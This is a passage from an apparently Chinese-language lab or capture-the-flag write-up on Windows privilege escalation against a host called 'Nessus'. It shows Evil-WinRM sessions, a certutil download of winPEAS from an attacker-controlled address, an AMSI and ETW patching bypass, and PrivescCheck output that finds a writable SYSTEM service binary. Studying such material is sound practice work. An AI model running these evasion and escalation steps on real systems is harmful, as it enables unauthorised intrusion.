..\/winPEAS.exe winPEAS.exe\n\nInfo: Uploading \/home\/kali\/temp\/Nessus\/..\/winPEAS.exe to C:\\Users\\nesus\\Desktop\\winPEAS.exe\n\nData: 629416 bytes of 629416 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\nProgram &#039;certutil.exe&#039; failed to run: Access is deniedAt line:1 char:1\n+ certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.\nAt line:1 char:1\n+ certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException\n    + FullyQualifiedErrorId : NativeCommandFailed\n\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; dir\n\n    Directory: C:\\Users\\nesus\\Desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----        10\/18\/2024   1:41 PM             33 user.txt\n-a----          6\/9\/2025   3:00 AM         472064 winPEAS.exe\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; Bypass-4MSI\n\nInfo: Patching 4MSI, please be patient...\n\n[+] Success!\n\nInfo: Patching ETW, please be patient ..\n\n[+] Success!\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; whoami\nnessus\\nesus\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; services\n\nPath                                                                            Privileges Service          \n----                                                                            ---------- -------          \nC:\\Windows\\gAwFavaS.exe                                                              False fsMT             \nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\SMSvcHost.exe                         True NetTcpPortSharing\nC:\\Windows\\SysWow64\\perfhost.exe                   
                                  False PerfHost         \n&quot;C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe&quot;           False Sense            \n&quot;C:\\Program Files\\Tenable\\Nessus\\nessus-service.exe&quot;                                 False Tenable Nessus   \nC:\\Windows\\iAkZGZHW.exe                                                              False tldJ             \nC:\\Windows\\servicing\\TrustedInstaller.exe                                            False TrustedInstaller \n&quot;C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25040.2-0\\NisSrv.exe&quot;        True WdNisSvc         \n&quot;C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25040.2-0\\MsMpEng.exe&quot;       True WinDefend<\/code><\/pre>\n<p>\u8fd0\u884c\u4e0d\u4e86\u3002\u3002\u3002\u3002\u3002\u53d7\u4e0d\u4e86\u4e86\uff0c\u6362\u4e00\u4e2a\u7a0d\u5fae\u6df7\u6dc6\u4e00\u70b9\u7684\u5427\u3002\u3002\u3002<\/p>\n<blockquote>\n<p>\u4e2d\u95f4\u53d1\u73b0\u4e0a\u4f20\u7684winpeas\u88ab\u6740\u8fc7\u3002\u3002\u3002<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; upload winPEAS.exe winPEAS.exe\n\nInfo: Uploading \/home\/kali\/temp\/Nessus\/winPEAS.exe to C:\\Users\\nesus\\Desktop\\winPEAS.exe\n\nError: Upload failed. 
Check filenames or paths: No such file or directory - No such file or directory \/home\/kali\/temp\/Nessus\/winPEAS.exe\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; upload ..\/winPEAS.exe winPEAS.exe\n\nInfo: Uploading \/home\/kali\/temp\/Nessus\/..\/winPEAS.exe to C:\\Users\\nesus\\Desktop\\winPEAS.exe\n\nData: 629416 bytes of 629416 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; dir\n\n    Directory: C:\\Users\\nesus\\Desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----        10\/18\/2024   1:41 PM             33 user.txt\n-a----          6\/9\/2025   3:18 AM         472064 winPEAS.exe\n\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; winPEAS.exe\nThe term &#039;winPEAS.exe&#039; is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.\nAt line:1 char:1\n+ winPEAS.exe\n+ ~~~~~~~~~~~\n    + CategoryInfo          : ObjectNotFound: (winPEAS.exe:String) [], CommandNotFoundException\n    + FullyQualifiedErrorId : CommandNotFoundException\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; C:\\Users\\nesus\\Desktop\\winPEAS.exe\nProgram &#039;winPEAS.exe&#039; failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1\n+ C:\\Users\\nesus\\Desktop\\winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.\nAt line:1 char:1\n+ C:\\Users\\nesus\\Desktop\\winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException\n    + FullyQualifiedErrorId : NativeCommandFailed\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; invoke-binary -Path &quot;C:\\Users\\nesus\\Desktop\\winPEAS.exe&quot;\n.SYNOPSIS\n    Execute binaries from memory.\n    PowerShell Function: Invoke-Binary\n    Author: 
Luis Vacas (CyberVaca)\n\n    Required dependencies: None\n    Optional dependencies: None\n.DESCRIPTION\n\n.EXAMPLE\n    Invoke-Binary \/opt\/csharp\/Watson.exe\n    Invoke-Binary \/opt\/csharp\/Binary.exe param1,param2,param3\n    Invoke-Binary \/opt\/csharp\/Binary.exe &#039;param1, param2, param3&#039;\n    Description\n    -----------\n    Function that execute binaries from memory.\n\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; invoke-binary \/home\/kali\/temp\/winPEAS.exe\nException calling &quot;Execute&quot; with &quot;1&quot; argument(s): &quot;The input is not a valid Base-64 string as it contains a non-base 64 character, more than two padding characters, or an illegal character among the padding characters. &quot;\nAt line:31 char:1\n+ [Cabesha.Injector]::Execute($argumentos)}\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException\n    + FullyQualifiedErrorId : FormatException<\/code><\/pre>\n<p>\u6362\u4e00\u4e2a<code>.bat<\/code>\u811a\u672c\u53ef\u4ee5\uff0c\u5c31\u662f\u6ca1\u6709\u591a\u5c11\u5f69\u8272\u663e\u793a\uff0c\u770b\u7740\u633a\u522b\u626d\uff0c\u4f46\u662f\u4e0a\u4f20\u4ee5\u540e\u6ca1\u53d1\u73b0\u5565\u5229\u7528\u70b9\uff0c\u53ef\u80fd\u662f\u6211\u4e0d\u592a\u719f\u6089\u5427\uff0c\u6ca1\u6807\u7ea2\u5c31\u770b\u4e0d\u51fa\u6765\u3002\u3002\u3002<\/p>\n<p>\u7136\u540e\u5c31\u662f\u6f2b\u957f\u7684\u8bd5\u9519\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Users\\nesus\\desktop&gt; systeminfo\nsysteminfo.exe : ERROR: Access denied\n    + CategoryInfo          : NotSpecified: (ERROR: Access denied:String) [], RemoteException\n    + FullyQualifiedErrorId : NativeCommandError<\/code><\/pre>\n<p>\u7136\u540e\u53c2\u8003\u4e86\u8fd9\u4e2a\u6587\u7ae0\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<a 
href=\"https:\/\/www.cnblogs.com\/Hekeats-L\/p\/16879325.html\">https:\/\/www.cnblogs.com\/Hekeats-L\/p\/16879325.html<\/a><\/p>\n<blockquote>\n<p>\u7528\u5230\u4e86\u8fd9\u4e2a\u811a\u672c\uff1a<a href=\"https:\/\/github.com\/itm4n\/PrivescCheck\">https:\/\/github.com\/itm4n\/PrivescCheck<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Users\\nesus\\desktop&gt; upload ..\/PrivescCheck.ps1 PrivescCheck.ps1\n\nInfo: Uploading \/home\/kali\/temp\/Nessus\/..\/PrivescCheck.ps1 to C:\\Users\\nesus\\desktop\\PrivescCheck.ps1\n\nData: 280648 bytes of 280648 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nesus\\desktop&gt; Set-ExecutionPolicy Bypass -Scope process -Force\n*Evil-WinRM* PS C:\\Users\\nesus\\desktop&gt; . .\\PrivescCheck.ps1\n*Evil-WinRM* PS C:\\Users\\nesus\\desktop&gt; Invoke-PrivescCheck\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0043 - Reconnaissance                           \u2503\n\u2503 NAME     \u2503 User identity                                     \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Get information about the current user (name, domain name)   \u2503\n\u2503 and its access token (SID, integrity 
level, authentication   \u2503\n\u2503 ID).                                                         \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\nName             : NESSUS\\nesus\nSID              : S-1-5-21-2986980474-46765180-2505414164-1001\nIntegrityLevel   : Medium Mandatory Level (S-1-16-8192)\nSessionId        : 0\nTokenId          : 00000000-0002ab27\nAuthenticationId : 00000000-0002a294\nOriginId         : 00000000-00000000\nModifiedId       : 00000000-0002a2b1\nSource           : NtLmSsp (00000000-00000000)\n\n[*] Status: Informational - Severity: None - Execution time: 00:00:00.456\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0043 - Reconnaissance                           \u2503\n\u2503 NAME     \u2503 User groups                                       \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Get information about 
the groups the current user belongs to \u2503\n\u2503 (name, type, SID).                                           \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\nName                                   Type           SID\n----                                   ----           ---\nNESSUS\\None                            Group          S-1-5-21-2986980474-46765180-2505414164-513\nEveryone                               WellKnownGroup S-1-1-0\nBUILTIN\\Remote Management Users        Alias          S-1-5-32-580\nBUILTIN\\Users                          Alias          S-1-5-32-545\nNT AUTHORITY\\NETWORK                   WellKnownGroup S-1-5-2\nNT AUTHORITY\\Authenticated Users       WellKnownGroup S-1-5-11\nNT AUTHORITY\\This Organization         WellKnownGroup S-1-5-15\nNT AUTHORITY\\Local account             WellKnownGroup S-1-5-113\nNT AUTHORITY\\NTLM Authentication       WellKnownGroup S-1-5-64-10\nMandatory Label\\Medium Mandatory Level Label          S-1-16-8192\n\n[*] Status: Informational - Severity: None - Execution time: 00:00:00.137\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0004 - Privilege Escalation                     \u2503\n\u2503 NAME     \u2503 User privileges                                   \u2503\n\u2503 TYPE     \u2503 Base                    
                          \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether the current user is granted privileges that    \u2503\n\u2503 can be leveraged for local privilege escalation.             \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\nName                          State   Description                    Exploitable\n----                          -----   -----------                    -----------\nSeChangeNotifyPrivilege       Enabled Bypass traverse checking             False\nSeIncreaseWorkingSetPrivilege Enabled Increase a process working set       False\n\nName        : fsMT\nDisplayName : fsMT\nImagePath   : C:\\Windows\\gAwFavaS.exe\nUser        : LocalSystem\nStartMode   : Manual\n\nName        : ssh-agent\nDisplayName : OpenSSH Authentication Agent\nImagePath   : C:\\Windows\\System32\\OpenSSH\\ssh-agent.exe\nUser        : LocalSystem\nStartMode   : Disabled\n\nName        : Tenable Nessus\nDisplayName : Tenable Nessus\nImagePath   : &quot;C:\\Program Files\\Tenable\\Nessus\\nessus-service.exe&quot;\nUser        : LocalSystem\nStartMode   : Automatic\n\nName        : tldJ\nDisplayName : tldJ\nImagePath   : C:\\Windows\\iAkZGZHW.exe\nUser        : LocalSystem\nStartMode   : Manual\n\n[*] Status: Informational - Severity: None - Execution time: 
00:00:02.166\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0004 - Privilege Escalation                     \u2503\n\u2503 NAME     \u2503 Vulnerable Kernel drivers                         \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether known vulnerable kernel drivers are installed. \u2503\n\u2503 It does so by computing the file hash of each driver and     \u2503\n\u2503 comparing the value against the list provided by             \u2503\n\u2503 loldrivers.io.                                               
\u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\nWarning: Service: RasGre | Path not found: C:\\Windows\\System32\\drivers\\rasgre.sys\n\n[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:01.668\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0004 - Privilege Escalation                     \u2503\n\u2503 NAME     \u2503 Service image file permissions                    \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether the current user has any write permissions on  \u2503\n\u2503 a service&#039;s binary or its folder.                            
\u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\nWarning: QueryServiceStatusEx - The handle is invalid (6)\n\nName              : Tenable Nessus\nDisplayName       : Tenable Nessus\nUser              : LocalSystem\nImagePath         : &quot;C:\\Program Files\\Tenable\\Nessus\\nessus-service.exe&quot;\nStartMode         : Automatic\nType              : Win32OwnProcess\nRegistryKey       : HKLM\\SYSTEM\\CurrentControlSet\\Services\nRegistryPath      : HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tenable Nessus\nStatus            :\nUserCanStart      : False\nUserCanStop       : False\nModifiablePath    : C:\\Program Files\\Tenable\\Nessus\\nessus-service.exe\nIdentityReference : NESSUS\\nesus (S-1-5-21-2986980474-46765180-2505414164-1001)\nPermissions       : AllAccess\n\n[*] Status: Vulnerable - Severity: High - Execution time: 00:00:07.600\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0004 - Privilege Escalation                     \u2503\n\u2503 NAME     \u2503 Service unquoted paths                            \u2503\n\u2503 TYPE     \u2503 Base                                              
\u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether there are services configured with an          \u2503\n\u2503 exploitable unquoted path that contains spaces.              \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\n[*] Status: Vulnerable - Severity: Low - Execution time: 00:00:00.030\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0006 - Credential Access                        \u2503\n\u2503 NAME     \u2503 Credential Guard                                  \u2503\n\u2503 TYPE     \u2503 Base                                              
\u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether Credential Guard is supported and enabled.     \u2503\n\u2503 Note that when Credential Guard is enabled, credentials are  \u2503\n\u2503 stored in an isolated process (&#039;LsaIso.exe&#039;) that cannot be  \u2503\n\u2503 accessed, even if the kernel is compromised.                 \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\nSecurityServicesConfigured  : (null)\nSecurityServicesRunning     : (null)\nSecurityServicesDescription : Credential Guard is not supported.\nLsaCfgFlagsPolicyKey        : HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard\nLsaCfgFlagsPolicyValue      : LsaCfgFlags\nLsaCfgFlagsPolicyData       : (null)\nLsaCfgFlagsKey              : HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA\nLsaCfgFlagsValue            : LsaCfgFlags\nLsaCfgFlagsData             : (null)\nLsaCfgFlagsDescription      : Credential Guard is not configured.\n\n[*] Status: Informational - Severity: None - Execution time: 
00:00:00.052\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0004 - Privilege Escalation                     \u2503\n\u2503 NAME     \u2503 AlwaysInstallElevated                             \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether the &#039;AlwaysInstallElevated&#039; policy is enabled  \u2503\n\u2503 system-wide and for the current user. If so, the current     \u2503\n\u2503 user may install a Windows Installer package with elevated   \u2503\n\u2503 (SYSTEM) privileges.                                         
\u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\nLocalMachineKey   : HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\nLocalMachineValue : AlwaysInstallElevated\nLocalMachineData  : (null)\nDescription       : AlwaysInstallElevated is not enabled in HKLM.\n\n# \u5220\u9664\u4e86\u90e8\u5206\u65e0\u7528\u7684\u4fe1\u606f<\/code><\/pre>\n<p>\u53d1\u73b0\u4e86\u4e00\u5904\u6743\u9650\u6bd4\u8f83\u9ad8<code>C:\\Program Files\\Tenable\\Nessus\\nessus-service.exe<\/code>\uff0cAllAccess\u662f\u6743\u9650\u96c6\u5408\u4e2d\u7684<strong>\u5b8c\u5168\u63a7\u5236\u6743\u9650<\/strong>\uff0c\u8986\u76d6\u6240\u6709\u5176\u4ed6\u57fa\u7840\u6743\u9650\uff08\u5982\u8bfb\u53d6\u3001\u5199\u5165\u3001\u6267\u884c\u7b49\uff09\uff0c\u5141\u8bb8\u7528\u6237\u6216\u7ec4\u5bf9\u8d44\u6e90\u8fdb\u884c<strong>\u65e0\u9650\u5236\u64cd\u4f5c<\/strong>\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\&gt; cd &quot;C:\\Program Files\\Tenable\\Nessus\\&quot;\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; dir\n\n    Directory: C:\\Program Files\\Tenable\\Nessus\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----        10\/18\/2024  10:35 AM              1 .winperms\n-a----          5\/9\/2024  11:30 PM        2471544 fips.dll\n-a----          5\/9\/2024  11:30 PM        5217912 icudt73.dll\n-a----          5\/9\/2024  11:30 PM        1575032 icuuc73.dll\n-a----          5\/9\/2024  11:30 PM        4988536 legacy.dll\n-a----          5\/9\/2024  11:06 PM         375266 License.rtf\n-a----          5\/9\/2024  11:37 PM       
